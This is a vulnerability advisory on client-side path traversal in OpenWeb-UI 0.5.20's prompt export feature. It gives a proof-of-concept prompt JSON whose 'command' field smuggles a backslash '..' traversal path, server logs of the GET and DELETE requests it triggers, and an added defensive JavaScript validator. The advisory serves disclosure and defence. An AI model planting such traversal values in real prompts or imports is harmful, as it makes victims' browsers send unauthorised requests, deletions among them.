openweb-ui 0.5.20 Client-Side Path Traversal (CSPT)

2025.03.30
CXSECURITY (PL)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Summary

A vulnerability has been identified in OpenWeb-UI's prompt export feature that allows attackers to craft malicious prompts containing specially crafted path references. When these malicious prompts are interacted with (e.g., clicked, deleted), the client-side application makes GET or DELETE requests to attacker-defined paths. This can lead to unauthorized requests to arbitrary endpoints, potentially resulting in information disclosure, exploitation of other services, or unwanted server-side actions.

Affected Component(s)

OpenWeb-UI Prompt Export Functionality: versions or instances with the export feature where prompts can contain unvalidated endpoints or special path references.

Vulnerability Details

Client-Side Path Traversal (CSPT)

The vulnerability arises from the way prompts are exported and rendered to the user. If a prompt includes payloads referencing "/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ENDPOINT_DEFINED_BY_BAD_GUY", the application's UI may interpret these paths as legitimate URLs.

Unauthorized DELETE Requests

Attempting to delete the malicious prompt can trigger a DELETE request to an arbitrary endpoint (e.g., "/ENDPOINT_DEFINED_BY_BAD_GUY/delete"). An attacker could craft a prompt that, when deleted, issues a DELETE request to sensitive system endpoints, potentially removing resources the attacker is not authorized to delete.
Proof of Concept - 'command' parameter (PoC)

---
[{"command":"/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ENDPOINT_DEFINED_BY_BAD_GUY","user_id":"22ac3651-d60f-437d-92e8-e538a6e308df","title":"Test","content":"Test","timestamp":1743320252,"access_control":null,"user":{"id":"22ac3651-d60f-437d-92e8-e538a6e308df","name":"admin","email":"admin@localhost","role":"admin","profile_image_url":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABkCAYAAABw4pVUAAAAAXNSR0IArs4c6QAABUdJREFUeF7tnFtsFFUcxr+Zve9sGigUo4ESL2AVBBKq4gVDoqLhAURBtK2mRBNDfNBo9MFEHtCYmPggJjyYeCvFotUKD96NIgoYhahIQmnLJSoVUNSKO7vd3dkdM33Y7rFtaHam02+S/7x1duecb36/ftszM621f1+ptSEbDQFNhNC4GAoiQrh8iBAyHyJEhLARIMsjP0NECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBHiIYFQDKG6RmVA20qjdPagh5P4O1SgGxJtfBrRhY+OIGZumwM795e/JD2aLdBCjKZuaIkZI1AUDm1B7ruNHiHyd5jACtFr5yG5+qtRadnZP2B2NPhL0qPZAiskfks7wrNXjIkh03U9SgM9HmHyb5jACkm1/gaEYmOSso7vwOCuB/0j6dFMgRQSvnQN4steVhFYWSCcKO+zrQzMtlkeYfJvmEAKSa7eDb12/jB8sx/Wr58h0tCqkMt+cjeKJz/3j6YHMwVOiBatgXHfcecvusunn//+eVh9byG57gcFSfH0XmQ/WOkBJv+GCJyQ6NUbEV3wSAUhG+bW2bALJox7D0NLXjD8WslC+o2LALvoH1GXMwVOiNHUAy0xvXzapT8PIbNz2dDXsWufRWT+BgVJ7psnUTj8qktM/h0eKCH6tAVI3rFLoTO4ewOso51D+7REHYymI8rrpYFeZLqu84+oy5kCJSR+65sI199e8ZGUR/r1CxUExrofoaUqV1c2zG2Xwc4NuETlz+GBEpJafwrQo2UyzgrKWUlVbtHFTyG66HFlX/6nzcjv3+QPUZezBEZIeM49iN+0RTnd7PsrUDzzrbJPi02B0XJM2Wdnf4fZcYVLVP4cHhghyTu/hj71yjIVO/8PzPZLRqWUXLsfeo36WqZrCUoDff5QdTFLIIRosVoYLb3KtUehpx25PSNvvTssnFvyzq35ys069i4Gv3zIBSp/Dg2EkNg1mxC56mGFiHN73c6cHpWSFkogtnSz+rEVkFspgRBiNPdCi09z/S2a/XgNiv3qstn1oB4PQC9En74IyVXe3I8qntqD7IerPEbo7XD0QuLLtyM8a7k3Zx2AWyncQjQdqdZ+5drDzp6F9ctH4xIUmtEIfaq63M3tfQyFI23jOn4y3kQtJDK3GbGlL6k/zPc9gUL3a+NipU+5HMm79invLf3djcx7N47r+Ml4E7UQB6YDtbxV8ZFjtPTBWTYPb/bQ9YudPzcZvM87J60QZ1VlNDvPxIefe1TzfMNZ/kbmtigg8gdfRP7AM+eFMxlvoBUSW/IcIvPUC7lqngDqNRcjufaAek2SOQNz+/BV/2SAH2tOWiEjPmqsLNJtM6ti9/9nKM4gmXcaUTp3oqrxJvIgSiGhusVIrPxUOW/rxE4MfvFAVSxiN7yASMN6dbyjnXCepbBtlEISt3UiNPNmhZWb37PSU/Ujnrc7j3zNrfVsPjj/s7Vx/8/QIqkyLOfaw+yoWG1VgXG0Xzs1314IO32yitEm7hDKhkzc6fKPLELIHIkQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSETMh/FHs5A+2/FucAAAAASUVORK5CYII="}}]
---

When the user clicks on the prompt, a GET request is triggered due to CSPT:

INFO: 127.0.0.1:63151 - "GET /ENDPOINT_DEFINED_BY_BAD_GUY HTTP/1.1" 200 OK

When the user tries to delete the prompt, a DELETE request is triggered, targeting an arbitrary endpoint:

INFO: 127.0.0.1:63221 - "DELETE /ENDPOINT_DEFINED_BY_BAD_GUY/delete HTTP/1.1" 405 Method Not

A user may create a malicious prompt to manipulate the DELETE request and remove other elements.

Update: The issue was reported to the authors for version 0.5.4 and has still not been accepted for fixing.

Author: Maksymilian Arciemowicz from CXSECURITY
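The following is an added example written for this page; it is not OpenWeb-UI's code and not part of the advisory. It takes the "command" value from the PoC above and shows, with the WHATWG URL parser that browsers and Node use, how concatenating it into a route lets the request climb out to "/ENDPOINT_DEFINED_BY_BAD_GUY" (backslashes are treated as slashes for http URLs, then the ".." segments are collapsed). Beside it sits a hardened builder that allowlists the command, percent-encodes it and re-checks the normalised path, plus an import-time filter that rejects such prompts before they are rendered. The origin, the route prefix "/api/v1/prompts/command/" and the allowlist regex are assumptions for illustration, not the project's actual routes or policy.

```javascript
// Added example (not OpenWeb-UI's code and not from the advisory author):
// shows how an unvalidated prompt "command" climbs out of the intended route
// once the browser normalises the URL, and one way to reject it on import.
// ORIGIN, PROMPT_ROUTE and COMMAND_ALLOWLIST are assumptions for illustration,
// not the project's real routes or policy.

// The "command" value from the advisory's PoC JSON (one backslash per "\\").
const POC_COMMAND =
  "/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ENDPOINT_DEFINED_BY_BAD_GUY";

const ORIGIN = "http://localhost:8080";          // assumed app origin
const PROMPT_ROUTE = "/api/v1/prompts/command/"; // assumed route prefix

// Vulnerable pattern: the untrusted command is concatenated straight into the URL.
// For http(s) URLs the WHATWG parser treats "\" like "/" and collapses "..",
// so the resolved path leaves PROMPT_ROUTE entirely. The same builder would be
// used for the GET on click and the DELETE on removal.
function buildPromptUrlUnsafe(command) {
  return new URL(PROMPT_ROUTE + command, ORIGIN);
}

// Hardened pattern: allowlist the command, percent-encode it, then verify the
// normalised URL still sits under the expected route before any request is made.
const COMMAND_ALLOWLIST = /^[A-Za-z0-9_-]{1,64}$/; // assumed policy

function buildPromptUrlSafe(command) {
  if (typeof command !== "string" || !COMMAND_ALLOWLIST.test(command)) {
    throw new Error("rejected prompt command: " + JSON.stringify(command));
  }
  const url = new URL(PROMPT_ROUTE + encodeURIComponent(command), ORIGIN);
  // Defence in depth: the allowlist should make this unreachable, but check anyway.
  if (url.origin !== ORIGIN || !url.pathname.startsWith(PROMPT_ROUTE)) {
    throw new Error("resolved URL left the prompt route: " + url.href);
  }
  return url;
}

// Import-time filter for an exported prompt list shaped like the PoC JSON.
// Returns the prompts that are safe to render plus the rejected commands,
// which is what an application would log as a detection signal.
function validateImportedPrompts(prompts) {
  const accepted = [];
  const rejected = [];
  for (const prompt of prompts) {
    try {
      buildPromptUrlSafe(prompt.command);
      accepted.push(prompt);
    } catch (err) {
      rejected.push({ command: prompt.command, reason: err.message });
    }
  }
  return { accepted, rejected };
}

// Constructed import: the advisory's PoC entry next to a benign one.
const SAMPLE_IMPORT = [
  { command: POC_COMMAND, title: "Test", content: "Test" },
  { command: "summarize", title: "Summarize", content: "Summarize the text." },
];

// Stand-alone demonstration (run with: node this_file.js).
console.log("unsafe builder resolves to:", buildPromptUrlUnsafe(POC_COMMAND).pathname);
const result = validateImportedPrompts(SAMPLE_IMPORT);
console.log("accepted:", result.accepted.map((p) => p.command));
console.log("rejected:", result.rejected);
```

The unsafe builder reproduces the path seen in the server log ("/ENDPOINT_DEFINED_BY_BAD_GUY"), while the safe builder throws for the PoC command and leaves "summarize" under the route. Rejecting at import time, rather than only at request time, keeps the malicious entry out of the UI entirely, so neither the click (GET) nor the removal (DELETE) path can be reached.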



Copyright 2025, cxsecurity.com
